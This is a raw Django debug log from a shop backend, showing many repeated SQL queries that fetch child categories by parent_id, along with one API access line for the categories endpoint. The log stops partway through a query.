13:15:20,294 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:15:20,298 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:15:20,303 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:15:20,307 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:15:20,311 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:15:20,315 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:15:20,319 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:15:20,325 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:15:20,329 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:15:20,332 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:15:20,336 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:15:20,340 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:15:20,346 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:15:20,350 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:15:20,354 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:15:20,358 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:15:20,362 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:15:20,366 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:15:20,371 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:15:20,375 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:15:20,379 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:15:20,384 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:15:20,388 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:15:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:15:47,308 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:15:47,317 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:15:47,322 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:15:47,325 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:15:47,330 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:15:47,332 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:15:47,335 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:15:47,337 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:15:47,340 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:15:47,343 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:15:47,345 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:15:47,348 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:15:47,350 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:15:47,353 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:15:47,356 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:15:47,359 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:15:47,361 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:15:47,363 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:15:47,366 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:15:47,370 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:15:47,372 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:15:47,374 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:15:47,377 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:15:47,379 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:15:47,381 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:15:47,384 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:15:47,387 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:15:47,389 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:15:47,391 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:15:47,393 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:15:47,397 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:15:47,399 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:15:47,401 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:15:47,403 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:15:47,406 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:15:47,409 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:15:47,412 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:15:47,414 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:15:47,416 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:15:47,418 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:15:47,421 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:15:47,423 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:15:47,426 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:15:47,428 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:15:47,431 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 